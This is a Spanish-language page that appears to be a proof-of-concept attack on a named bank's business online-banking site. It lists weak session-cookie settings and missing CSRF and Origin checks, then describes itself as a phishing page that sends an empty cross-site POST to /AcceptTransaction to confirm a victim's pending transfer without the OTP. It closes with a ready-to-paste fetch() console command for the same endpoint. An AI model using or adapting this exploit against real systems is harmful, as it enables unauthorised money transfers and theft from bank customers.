SameSite=None — Cookie enviada en peticiones cross-origin

ASP.NET_SessionId se envía en cada petición a banesconlinempresa.banesco.com, sin importar el origen
NombreASP.NET_SessionId
Dominiobanesconlinempresa.banesco.com
SameSiteNone — se envía en TODAS las peticiones cross-site
HttpOnlyFALSE — legible por JavaScript
Token CSRFNINGUNO — /AcceptTransaction acepta {} vacío
Validación OriginNINGUNA — sin validación de Origin/Referer

Ataque CSRF — Confirmar transferencia pendiente

La víctima debe tener: (1) sesión activa en BanescOnline, (2) una transferencia pendiente esperando OTP. Esta página envía POST {} a /AcceptTransaction — la cookie se adjunta automáticamente.
1
Víctima
inicia transferencia
2
Llega a pantalla
de OTP
3
Visita esta
página de phishing
4
POST {}
enviado cross-origin
5
Transferencia
confirmada
[Sistema] Listo. Requiere sesión activa en BanescOnline con transferencia pendiente.

Prueba definitiva mismo origen

Los POST cross-origin con JSON disparan CORS preflight. Para probar definitivamente que el backend no valida OTP, pegue este comando en la consola del navegador estando en la página de transferencias del banco (mismo origen):
fetch('/lazaro/WebSite/Transferencias/TransferenciaInmediata.aspx/AcceptTransaction', { method: 'POST', headers: {'Content-Type': 'application/json; charset=utf-8'}, body: '{}', credentials: 'include' }).then(r => r.json()).then(d => console.log('Respuesta AcceptTransaction:', d));
Clic en el bloque de código para copiar. Luego pegue en la Consola de DevTools (F12) en cualquier página de banesconlinempresa.banesco.com.